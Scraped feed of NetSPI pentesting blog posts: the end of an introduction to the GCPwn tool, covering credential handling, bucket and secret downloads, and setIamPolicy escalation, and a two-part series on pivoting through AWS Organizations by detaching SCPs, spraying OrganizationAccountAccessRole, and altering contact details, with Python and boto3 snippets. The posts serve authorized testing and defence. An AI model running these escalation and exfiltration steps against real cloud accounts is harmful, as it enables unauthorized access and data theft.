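) 

# Either credentials object can be handed to a service client 
client = storage.Client(project="my-private-test-project-430102", credentials=token_creds) 
for bucket in client.list_buckets(): 
    print(bucket.name) 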

As seen above, each prompt within GCPwn includes the default project ID followed by the name tag for the current credential set. For many modules, especially those in the “enumeration” category, this is the default project ID that the tool would fall back to. To override the default project, you can pass in the following flag with modules: --project-ids <project_id1>,<project_id2>,…. As will be seen in later parts of this blog, if multiple project IDs are known, GCPwn will prompt the user if they want to run modules in the current default project ID or all known project IDs. 

A couple quick final notes about the credentials include: 

  1. The tool saves credentials between runs, so resuming the tool (running "python3 main.py") should allow you to resume your credentials context. Note certain credentials like standalone OAuth2 tokens might expire based on the time between runs. 
  2. You can add credentials from within the tool with creds add as opposed to having to re-run "python3 main.py" each time.
  3. You can swap between credentials you have saved within one workspace with creds swap. 
  4. You can update credentials via creds update. For example, if your OAuth2 token expires and you get a new standalone token, you can run creds update with the flags dictated by the help menu to swap out your expired OAuth2 token with the new one.  
  5. You can see all permissions and other "whoami" information about your creds thus far with creds info. This command will probably be run a lot, and creds info --csv saves the summary to a CSV file in the "GatheredData" folder (helpful when dealing with potentially thousands of permissions). 
  6. You can use tokeninfo when adding credentials or from within the current credential set to send the current OAuth2 token to Google's official "tokeninfo" endpoint detailed here. 
  7. You can manually set your current project with projects set <project_id> in the tool. This is useful if you manually want to add a project (maybe discovered through recon) to launch modules in, or if the tool is a bit buggy and didn’t add the project ID when adding credentials.

Step 2: Picking An Enumeration/Exploit/Process/Unauthenticated Module 

With the target credentials loaded, it's now time to put them to work by running modules. Modules in GCPwn are snippets of python code made to achieve certain tasks. Their self-contained nature makes them ideal for open-source contributions in the future (the wiki page on this topic is in progress). 

When in GCPwn you can run a module via modules run <module_name>. As of today, all current/upcoming modules are shown below. 

Modules are broken out into Enumeration, Exploit, Process, and Unauthenticated categories, usually within a respective service (the "Everything" category being the exception). Note most of these are covered in detail here.

Enumeration Modules 

Enumerate and download/exfiltrate data identified for the specified service. All the data enumerated is stored in GCPwn's internal SQLite databases, which can then be accessed by later exploit modules to make crafting attack vectors easier. By default, most modules when supplied with no flags just enumerate the service metadata (no downloads or testIamPermissions calls). They do so by generally making "List" API calls for the selected service followed by "Get" API calls for each entity found.  

Most enumeration modules support one of the following common flags: 

  1. --iam: If the service entity supports allow policies (ex. organizations, folders, projects, cloud functions, buckets, compute instances, etc.), then the enumeration module will run testIamPermissions for the given asset. While I won't dive into the testIamPermissions API here, I did write something up on hackingthe.cloud if that's something you want to review. In short, testIamPermissions allows you to pass in a list of permissions, and the response is the subset of those permissions you are actually allowed to call (a rough sketch of this pattern follows after this list).  
  2. --download: Exfiltrate/download data to the local filesystem in the GatheredData folder at the root of GCPwn. Running modules run enum_buckets --download, for example, will try to download all blobs enumerated in GCP. As another example, running modules run enum_secrets --download will try downloading all the secret version values. 
  3. --minimal-calls: If you want to ONLY call the “List” APIs and not the “Get” APIs. 
  4. --[resource-name] [resource_name_format]: Specify one or more specific resources. This is useful if you do not have “List” permissions for the given service, but you still know the specific resource name to target. resource_name_format can usually be found by running the -h flag for a given module to see the help menu. 

Besides these common flags, each service module usually has its own specific flags. Two examples are provided below: 

  1. --good-regex: A flag within “enum_buckets” to filter downloads based on a Python regex. For example, you could use it to target only files ending in a certain extension (ex. modules run enum_buckets --iam --download --good-regex "\.sh"). A minimal client-library sketch of this filtered download behavior is shown after this list. 
  2. --version-range: A flag within “enum_secrets” that defines a range of secret version integers to check, including the keyword “latest”. For example, you could use it to brute force secret versions if you know the secret name but can’t list anything specific (ex. modules run enum_secrets --secrets projects/[project_id]/secrets/test --version-range 1-99,latest --download). 
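
For intuition, below is a minimal sketch of roughly what a regex-filtered bucket download looks like with the google-cloud-storage client library. This is not GCPwn’s exact implementation; the project ID, output folder, and regex are placeholder values.

import re
from pathlib import Path
from google.cloud import storage

# Placeholder values for illustration only
PROJECT_ID = "my-private-test-project-430102"
OUTPUT_DIR = Path("GatheredData")
GOOD_REGEX = re.compile(r"\.sh$")  # only keep shell scripts

client = storage.Client(project=PROJECT_ID)  # picks up ADC credentials

for bucket in client.list_buckets():          # "List" buckets
    for blob in bucket.list_blobs():          # "List" objects per bucket
        if not GOOD_REGEX.search(blob.name):
            continue
        dest = OUTPUT_DIR / bucket.name / blob.name
        dest.parent.mkdir(parents=True, exist_ok=True)
        blob.download_to_filename(str(dest))  # download ("Get") call
        print(f"[+] Downloaded gs://{bucket.name}/{blob.name} -> {dest}")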

Finally, two notable enumeration modules to mention are “enum_all” and “enum_policy_bindings”. 

  1. “enum_all”: Accepts the common --iam, --download, etc. flags and will run ALL enumeration modules for you so you don’t have to run each of them individually. It is probably your go-to module in most engagements. 
  2. “enum_policy_bindings”: Gathers all IAM policies for all resources gathered thus far to be used in later IAM analysis if needed. This is a pre-requisite for “process_iam_bindings” which returns a summary of IAM roles per user.

Exploit Modules 

Exploit modules are more focused on privilege escalation or pivoting techniques rather than enumerating data. Ideally, most exploit modules can run with ZERO flags and GCPwn will reference any enumerated data thus far to walk you through a “wizard” of sorts. You can also pass in all the flags manually if you want. Among the exploit modules included are: 

  • exploit_generate_access_token: Generate an access token for a given service account 
  • exploit_generate_service_key: Generate a JSON service key for a given service account 
  • exploit_functions_invoke: Create or update a cloud function and subsequently invoke it to pull back the corresponding access tokens for the attached service account.  
  • exploit_[service]_setiampolicy: exploit setIamPolicy on the target resource, usually to set yourself as some type of admin over the resource 

Many of these exploit scripts were based on Rhino Security’s research in the area.  

In terms of the “wizard” walkthrough for exploit scripts, a demo is shown below for setIamPolicy on cloud storage buckets. Note that “enum_buckets” was run beforehand, so when you launch “exploit_storage_setiampolicy” with no flags, the tool will reference the buckets enumerated earlier and prompt the user to choose one for exploitation. 

(my-private-test-project-430102:test_blog)> modules run exploit_storage_setiampolicy 
> Choose an existing bucket from below to edit the corresponding policy: 
>> [1] bucket-[TRUNCATED] 
>> [2] gcf-v2-sources-[TRUNCATED] 
>> [3] gcf-v2-uploads-[TRUNCATED] 
>> [4] testw[TRUNCATED] 
> [5] Exit 
> Choose an option: 2 
> Do you want to use newserviceaccount@my-private-test-project-430102.iam.gserviceaccount.com set on the session? [y/n]n 
> Do you want to use an enumerated SA/User or enter a new email? 
>> [1] Existing SA/User 
>> [2] New Member 
> [3] Exit 
> Choose an option: 2 
> Provide the member account email below in the format user:<email> or serviceAccount:<email>: user: [REDACTED]@gmail.com 
> A list of roles are supplied below. Choose one or enter your own: 
>> [1] roles/storage.admin (Default) 
[TRUNCATED] 
> [12] Exit 
> Choose an option: 1 
[*] Binding Member user: [REDACTED]@gmail.com on gcf-v2-sources-[TRUNCATED] to role roles/storage.admin 
[*] Fetching current policy for gcf-v2-sources-[TRUNCATED]... 
[*] New policy below being added to gcf-v2-sources-[TRUNCATED]  
[[TRUNCATED], {'role': 'roles/storage.admin', 'members': ['user:[REDACTED]@gmail.com']}] 
[*] Successfully added user:[REDACTED]@gmail.com to the policy of bucket gcf-v2-sources-[TRUNCATED] 
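
Under the hood, this exploit boils down to a read-modify-write of the bucket’s IAM policy. A minimal sketch with the google-cloud-storage library is shown below (not GCPwn’s exact implementation; the bucket name and member email are placeholders):

from google.cloud import storage

# Placeholder values for illustration only
BUCKET_NAME = "gcf-v2-sources-example"
MEMBER = "user:attacker@example.com"
ROLE = "roles/storage.admin"

client = storage.Client()
bucket = client.bucket(BUCKET_NAME)

# Fetch the current policy, append our binding, and push it back
policy = bucket.get_iam_policy(requested_policy_version=3)
policy.bindings.append({"role": ROLE, "members": {MEMBER}})
bucket.set_iam_policy(policy)
print(f"[*] Bound {MEMBER} to {ROLE} on {BUCKET_NAME}")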

Unauthenticated Modules 

Unauthenticated modules can be run without any credentials or project set in GCPwn. Only a few exist at this point in time. This mainly encapsulates GCPBucketBrute which is included as “unauth_bucketbrute” and works the same as the standalone tool.  

Process Modules 

Process modules can be run offline and are mainly for ingesting IAM data for analyzing/presenting summaries and vulnerabilities.  

  • “process_iam_bindings”: Generate an IAM summary report of all IAM policy bindings pulled thus far. This includes inherited permissions and custom roles/convenience roles, assuming the caller has the permissions to resolve these scenarios. It should be noted that GCPwn will report inherited permissions wherever a user is attached to a resource. So, if User A has roles/owner at the organization level and roles/viewer at the project level, the tool will tell you that User A at the project level inherited roles/owner from the organization, but it WON’T necessarily tell you User A inherited roles/owner on bucket ABC within the project. That is something you can easily infer, though. 
  • “analyze_vulns”: Based on the results of “process_iam_bindings”, flag any users or service accounts with individual permissions, or combinations of permissions/roles, that would be deemed dangerous or risky. This is still in progress but currently provides a TXT/CSV listing those users/roles with “dangerous” permissions. It will also highlight all policies where allUsers or allAuthenticatedUsers members are identified. 

Step 3: Checking Permissions 

Permissions are an important aspect of GCPwn when you begin with credentials in an unknown environment. One of the first questions you usually ask is “what permissions do I have / what can I do?” Individual granular permissions are summarized per credential set via the `creds info` command, and roles are summarized through the output of “process_iam_bindings”. Permissions and roles are mainly populated by:

  1. Module runs: As you run modules, GCPwn notes all the permissions tied to successful API calls in the background. For example, if you are able to list all the buckets when you run “enum_buckets”, then GCPwn will note that you have the storage.buckets.list permission within the current project, which will be visible the next time you run creds info. 
  2. testIamPermissions: As discussed earlier, testIamPermissions is an API in GCP that takes in a large list of permissions and returns those permissions the caller has over the given resource. Interestingly, the API does not itself require a permission to invoke, meaning it is fairly accessible, as seen in the details for the project-level version: “There are no permissions required for making this API call”. Another nice feature of testIamPermissions is that it allows one to pass in a large set of permissions in one API call, making it very effective in permission enumeration, allowing up to ~9500 permissions in batches (link to that in “Final Notes”). As stated before, the --iam flag in enumeration modules invokes testIamPermissions at the specified resource level, and GCPwn saves all those testIamPermissions responses, which are visible the next time you run creds info. The TL;DR: add --iam to enumeration modules and you don’t have to manually manage it 🙂 A minimal sketch of a single project-level testIamPermissions call follows this list. 
  3. policy bindings: While 1 & 2 above deal with granular permissions, GCP predefined roles are collected when running “enum_policy_bindings”. This module will grab all the policy bindings for resources enumerated thus far which can then be run through “process_iam_bindings” to produce an IAM summary report. This would notably include the “roles” for the users/service accounts as opposed to the granular “permissions” and might be easier to read/parse. 
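
Below is a minimal sketch of one project-level testIamPermissions call using the Cloud Resource Manager v3 API (the project ID and the short permission list are placeholders; GCPwn handles batching the full permission list for you):

from googleapiclient import discovery

# Placeholder values for illustration only
PROJECT_ID = "my-private-test-project-430102"
PERMISSIONS_TO_TEST = [
    "storage.buckets.list",
    "secretmanager.secrets.list",
    "iam.serviceAccounts.list",
]

crm = discovery.build("cloudresourcemanager", "v3")  # picks up ADC credentials
response = (
    crm.projects()
    .testIamPermissions(
        resource=f"projects/{PROJECT_ID}",
        body={"permissions": PERMISSIONS_TO_TEST},
    )
    .execute()
)

# Only the permissions the caller actually holds are echoed back
print(response.get("permissions", []))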

The creds info command will probably be run a lot over the course of your pentest. An example is shown below of running creds info before and after executing the enum_buckets module. Note how fresh credentials have no permissions, but the successful enum_buckets execution added permissions in the background. 

Before Running Any Modules 

(production-project-1-426001:test_blog)> creds info 

Summary for test_blog: 
Email: newserviceaccount@production-project-1-426001.iam.gserviceaccount.com 
Scopes: 
    - N/A 
Default Project: production-project-1-426001 
All Projects: 
    - [TRUNCATED]

Access Token: N/A 

After Running “enum_buckets --iam”

(production-project-1-426001:test_blog)> creds info 

Summary for test_blog: 
Email: newserviceaccount@production-project-1-426001.iam.gserviceaccount.com 
Scopes: 
    - N/A 
Default Project: production-project-1-426001 
All Projects:
    - production-project-1-426001  
Access Token: N/A 
[******] Permission Summary for test_blog [******] 
- Project Permissions 
  - production-project[TRUNCATED] 
    - storage.buckets.list 
- Storage Actions Allowed Permissions 
  - production-project[TRUNCATED] 
    - storage.buckets.get 
      - gcf-v2-sources-[TRUNCATED] (buckets) 
      - gcf-v2-uploads-[TRUNCATED] (buckets) 
      - test[TRUNCATED] (buckets) 
    - storage.objects.list 
      - gcf-v2-sources-[TRUNCATED] (buckets) 
    - storage.objects.get 
      - gcf-v2-sources-[TRUNCATED] (buckets) 

Final Notes; TLDR 

No doubt the data above plus the wiki is a lot to digest. I think most people’s use cases will fall into two broad scenarios, which I’ve outlined in the wiki here. Most notably, my favorite scenario is how to brute force ~9500 permissions at the project level with testIamPermissions, which I think is pretty cool 😊

The post An Introduction to GCPwn – Part 1 appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration https://www.netspi.com/blog/technical-blog/cloud-pentesting/pivoting-clouds-aws-organizations-part-2/ Tue, 07 Mar 2023 19:36:18 +0000 https://www.netspi.com/pivoting-clouds-aws-organizations-part-2/ Explore AWS Organizations security implications and see a demonstration of a new Pacu module created for ease of enumeration. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments, specifically those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration, and to dive into various pivoting techniques following the initial “easy win” via created (as opposed to invited) member accounts. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 

Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note Account Management supports delegated administration as well but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access

With trusted access now enabled, update the contact information for Account B, changing items like the address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering with AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company to get access.

Figure 2: Update Member Account Contact Information
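
A rough boto3 equivalent of the two steps above, run with Account A’s credentials, is sketched below. The member account ID and contact fields are placeholders, and the account.amazonaws.com service principal is my assumption for the Account Management integration, so double-check it against the AWS documentation.

import boto3

# Placeholder values for illustration only
MEMBER_ACCOUNT_ID = "111111111111"  # Account B

# Step 1 (Figure 1): enable trusted access for Account Management
orgs = boto3.client("organizations")
orgs.enable_aws_service_access(ServicePrincipal="account.amazonaws.com")

# Step 2 (Figure 2): overwrite Account B's contact information cross-account
account = boto3.client("account")
account.put_contact_information(
    AccountId=MEMBER_ACCOUNT_ID,
    ContactInformation={
        "FullName": "Jane Attacker",
        "AddressLine1": "123 Example St",
        "City": "Minneapolis",
        "StateOrRegion": "MN",
        "PostalCode": "55401",
        "CountryCode": "US",
        "PhoneNumber": "+15555550100",
    },
)
print(account.get_contact_information(AccountId=MEMBER_ACCOUNT_ID))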

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. An SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organizational units (OUs) and propagate downwards through the overall organization hierarchy. They take precedence over any IAM privileges at the user/role level for their attached accounts. So even if users or roles in Account C have policies normally granting them S3 actions, they would still be blocked from calling S3 actions, as the SCP at the organization level takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 2: SCP Attached to Account C by Account A
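
For reference, a minimal boto3 sketch of creating and attaching an S3-deny SCP from the management account might look like the following (the member account ID and policy name are placeholders):

import json
import boto3

# Placeholder value for illustration only
ACCOUNT_C_ID = "222222222222"

scp_document = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Deny", "Action": "s3:*", "Resource": "*"}],
}

orgs = boto3.client("organizations")  # Account A (management) credentials
policy = orgs.create_policy(
    Name="DenyS3ForAccountC",
    Description="Block all S3 actions",
    Type="SERVICE_CONTROL_POLICY",
    Content=json.dumps(scp_document),
)
orgs.attach_policy(
    PolicyId=policy["Policy"]["PolicySummary"]["Id"],
    TargetId=ACCOUNT_C_ID,
)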

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add organization APIs from the subset provided in the AWS user guide

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 3: Allowing Policy Management by Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 4.

Figure 4: Try to list S3 Buckets as Account C

This makes sense, as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organizations feature, we as delegated administrators might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organizations service, try to remove the SCP created by Account A from Account C.

Figure 5: View Attached Policies and Try to Detach as Account C

Since the management account delegated us the rights to detach policies, the operation is successful, and we can now call S3 APIs as seen below in Figure 6. 

Figure 6: Observe Successful Detachment as Account C
Figure 7: List S3 Buckets as Account C

Rather than a trial-and-error method, you could also call the “describe-resource-policy” API as Account C and pull down the policy that exists in Account A. Remember that delegated administrators have read-only access by default so this should be possible unless otherwise restricted.

Figure 8: Retrieve Delegation Policy Defined in Account A as Account C
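
A boto3 sketch of the same recon-then-detach flow from Account C’s perspective is shown below (the account ID is a placeholder; skipping the AWS-managed FullAWSAccess policy is just a sanity check):

import boto3

# Placeholder value for illustration only
ACCOUNT_C_ID = "222222222222"  # the compromised delegated administrator

orgs = boto3.client("organizations")  # Account C credentials

# Pull the delegation policy defined in the management account (read-only access)
print(orgs.describe_resource_policy()["ResourcePolicy"]["Content"])

# Find every SCP attached directly to our own account and detach it
scps = orgs.list_policies_for_target(
    TargetId=ACCOUNT_C_ID, Filter="SERVICE_CONTROL_POLICY"
)["Policies"]
for scp in scps:
    if scp["Name"] == "FullAWSAccess":  # leave the default allow-all SCP alone
        continue
    print(f"[*] Detaching {scp['Name']} ({scp['Id']}) from {ACCOUNT_C_ID}")
    orgs.detach_policy(PolicyId=scp["Id"], TargetId=ACCOUNT_C_ID)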

Enumeration Tool for AWS Organizations

A lot of what I covered is based on AWS Organizations enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu. I also wrote an additional Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available in the traditional pip3 installation procedure detailed in the repository’s README. The two relevant forks are located here:

Note that the GitHub Pacu project contains all APIs discussed thus far, but as you might notice in the screenshots below, the pip installation does not yet include one read-only API (describe-resource-policy) along with one or two bug fixes at this time.

I won’t cover how Pacu works as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and a normal (not a delegated administrator) member account.  

Let’s first run Pacu with respect to Account A. Note that the module collects many associated attributes ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” you need to execute “data organizations.” My module also tries to build a visual graph at the end of the enumeration using the gathered account data.

Figure 9: Gather Organization Data from Account A
Figure 10: Data Gathered from Account A
Figure 11: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization but will not dump all the organization data since your credentials do not have the necessary API permissions. At the very least, this would help tell you at a glance if the account in question is part of an organization. 

Figure 12: Gather Organization Data from Account B
Figure 13: Data Gathered from Account B

Defense

The content discussed above does not represent any novel zero-days or an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and a lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with trusted access and delegated administration then allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are also monitored and not enabled if not needed. In all cases, protect AWS credentials so an attacker cannot gain access to the AWS environment, enumerate the existing resources using a module like the Pacu one above, and subsequently exploit any pivoting vectors. To get a complete picture of the organization’s actions, ensure proper logging is in place as well. 

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and considerable number of enabled/delegated service possibilities in AWS Organizations presents a serious vector for lateral movement within corporate environments. This could easily turn a single AWS account takeover into a multiple account takeover that might cross accepted software deployment boundaries (i.e. pre-production & production). More importantly, a lot of examples given above assume you have compromised a single user or role that allowed for complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular so maybe one compromised user/role has the permissions to enable a service, while another user/role has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role. Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin https://www.netspi.com/blog/technical-blog/cloud-pentesting/pivoting-clouds-aws-organizations-part-1/ Mon, 06 Mar 2023 23:21:07 +0000 https://www.netspi.com/pivoting-clouds-aws-organizations-part-1/ Explore several key points of AWS Organizations theory and learn exploitable opportunities in existing AWS solutions. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>
Amazon Web Services (AWS) is a cloud solution that is used by a large variety of consumers from the single developer to the large corporate hierarchies that make up much of our day-to-day lives. While AWS certainly offers many developer solutions, its roughly 33% cloud share, combined with its vertical customer spread, makes it an attractive target for hackers. This has resulted in numerous presentations/articles regarding privilege escalation within a single AWS account. 

While this is certainly instructional for smaller scale models or informal groupings of AWS accounts, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments that specifically leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.

This article uses an organization I built from my AWS penetration testing experience to both describe several key points of AWS Organizations theory and demonstrate exploitable opportunities in existing AWS solutions.

In part one of this two-part blog series, we’ll provide an “easy win” scenario and subsequently cover more involved pivoting opportunities with organization-integrated services. In part two, explore today’s AWS security features and tools for enumeration – including a Pacu module I built to assist in data collection.

AWS Accounts as a Security Boundary

Figure 1: AWS Account Boundaries

To differentiate one AWS account from another, AWS assigns each account a unique 12-digit value called an “AWS Account Number” (ex. 000000000001). For notation’s sake (and my own sanity), I will be swapping out 12-digit numbers with letters after initial account introductions below. These AWS accounts present a container or security boundary from an information security standpoint.

Entities created by a service for an individual developer’s AWS account would not be accessible to other AWS accounts. While both Account A and Account B have the S3 service, making a “bucket” in the S3 service in Account A means that bucket entity exists only in Account A, and not Account B.

Of course, you can configure resources to be shared cross-account, but for this generalization we are focusing on the existence and core ownership of the resource. Since AWS Organizations groups a lot of accounts together in one central service, it presents several opportunities to tunnel through these security boundaries and get the associated account’s resources/data.

AWS Organizations Vocabulary

Before we dive into organizations, let’s run through some quick vocabulary. AWS Organizations is an AWS service where customers can create “organizations.” An organization is composed of one or more individual AWS accounts. In Figure 2 below, Account A is the account that created the organization and, as such, is called the management account.

The management account has administrator-like privileges over the entire organization. It can invite other AWS accounts, remove AWS accounts, delete an organization, attach policies, and more. In Figure 2, Account A invited Account B and Account C to join its organization. Accounts B and C are still separate AWS accounts, but by accepting Account A’s invitation their references appear in Account A’s organization entity. Once the invite is accepted, Accounts B and C become member accounts and, by default, have significantly less privileges than the management account. 

A default member account can only view a few pieces of info associated with the management account. It cannot read other organization info, nor can it make changes in the organization. Default member accounts are so isolated that they do not have visibility into what other member accounts exist within the organization, only seeing themselves and the management account number. 

Organizational Units (OUs) can be thought of as customer-created “folders” that you can use for arranging account resources. Root is a special entity that appears in every AWS Organization and can be thought of as functionally equivalent to an OU under which all accounts exist.

A diagram of our sample organization is given in Figure 2. Account ***********0 (Account A) is the account in charge of managing the overall organization, Account ***********9 (Account B) is a member account holding pre-production data, and Account ***********6 (Account C) is a member account holding production data. Account B has a highlighted overly permissive role with a trust access policy set to *. For steps to set up an organization, refer to the AWS user guide.

Figure 2: AWS Organization Lab Layout

Finally, note that navigating to AWS Organizations in a management account like Account A provides a different UI layout than AWS Organizations in a member account like Account C (Figure 3 versus Figure 4). Notably, the left-hand navigation bar is different. Because member accounts have significantly fewer permissions with regard to the organization, navigating to “AWS Accounts” or “Policies” in a default member account returns permission errors as expected. These differences can aid testers in determining if they have access to a management or member account during AWS pentesting.

Figure 3: AWS Management Account Organizations UI
Figure 4: AWS Member Accounts Organizations UI

Easy Win with Account Creation

In Figure 2, along with most of this 2-part series, we will assume the member accounts in the organization were all pre-existing accounts that were added through individual invites. However, we will take a quick detour from this assumption to look at the AWS account creation feature as this can return an easy early win. This is shown in Figure 5.

Figure 5: AWS Account Creation Pivot

Account A can choose to create an AWS account when adding it to the organization (as opposed to inviting a pre-existing AWS account like Accounts B and C). When this is done, AWS creates a specific role with a default name of OrganizationAccountAccessRole in the newly created member account. We will denote this newly created member account as Account D.

Figure 6: Account Creation Workflow

If we were to view the newly created OrganizationAccountAccessRole role in Account D, we would see that the role has AdministratorAccess attached to it and trusts the management account, Account A.

Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy

Thus, if we compromise credentials for a user/role with the necessary privileges in Account A, we could go through each member account in the AWS Organization and try to assume this default role name. A successful attempt will return credentials as seen below (Figure 8) allowing one to pivot from, in this case, Account A to Account D essentially as an administrator.

Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D
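
A short boto3 sketch of spraying the default role name across every member account is shown below (the session name is arbitrary, and OrganizationAccountAccessRole is the default name discussed above):

import boto3
from botocore.exceptions import ClientError

ROLE_NAME = "OrganizationAccountAccessRole"  # default role created in new member accounts

orgs = boto3.client("organizations")  # management account (Account A) credentials
sts = boto3.client("sts")
my_account = sts.get_caller_identity()["Account"]

for page in orgs.get_paginator("list_accounts").paginate():
    for acct in page["Accounts"]:
        if acct["Id"] == my_account:
            continue
        role_arn = f"arn:aws:iam::{acct['Id']}:role/{ROLE_NAME}"
        try:
            creds = sts.assume_role(RoleArn=role_arn, RoleSessionName="org-pivot")["Credentials"]
            print(f"[+] Assumed {role_arn} (key: {creds['AccessKeyId']})")
        except ClientError:
            print(f"[-] Could not assume {role_arn}")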

Again, this is the “easy win” scenario where you can go from relative control in a management account to administrator control in a member account. However, this might not be as feasible if a default role is not present in member accounts, or you are lacking permissions, or the member account was invited instead of created. In these cases, trusted access and delegated administration would be the next two features to consider.

Trusted Access and Delegated Administration Review

A handful of AWS services have set up specific features or API subsets that integrate with AWS Organizations (ex. IAM Access Analyzer) allowing their functionality to expand from a single AWS account to the entire organization. These organization-integrated features are in what we might consider an “off” state by default.

Figure 9: Trusted Access & Delegated Administration Visualized

Per AWS, trusted access is when you “enable a compatible AWS service to perform operations across all of the AWS accounts in your organization.” In other words, you can think of trusted access as the “on” switch for these feature integrations. You “trust” the specific integrated feature thereby giving it “trusted access” to the organization data and associated accounts. The exact mechanism by which the feature operations are then carried out might involve service-linked roles created in each relevant account, but we will not examine this too closely for the purpose of this article. Just know trusted access generally grants the feature access to the entire organization.

Figure 9 demonstrates an expected trusted access workflow. Account A “enables” trusted access for one of the predefined organization-supported features which can then access the necessary management/member account resources. From this point onwards, the ability to influence/access/change the associated member accounts is feature specific with Access Analyzer, for example, choosing to access and scan each member account in the organization for trust violations. Enabling a feature like IAM Access Analyzer from the management account means it is an enabled service.

Delegated administration is a status applied to member accounts and gives the targeted member account “read-only access to AWS Organizations service data.” This would allow a member to perform actions like listing AWS organization accounts which was previously blocked per the UI errors in Figure 4. Additionally, the management account is “delegating” permissions to the member account with regards to a specific organization-integrated feature, such that the member account now has the permissions to run the specific feature within their own account on the entire organization. 

Delegated administration is illustrated by the blue lines in the diagram above (Figure 9). Account A would make Account C a delegated administrator specifically for IAM Access Analyzer, and Account C could now run IAM Access analyzer on the entire organization. Making a member account a delegated administrator for certain services like IAM Access Analyzer means Access Analyzer is a delegated service in Account C.

Trusted access and delegated administration are extremely feature-specific concepts and not every organization-integrated feature supports both trusted access and delegated administrators. Learn more about the services you can use with AWS Organizations here.

Leveraging IAM Access Analyzer through Trusted Access

Let’s assume we have compromised credentials for Account A. We could end this attack here but looking in AWS Organizations we would see the additional AWS Accounts B and C listed as member accounts. While we have no credentials or visibility into either member account, we can use our organization permissions from Account A to enable trusted access for a service (or use an already-enabled service). This will allow us to gather data on the member accounts. 

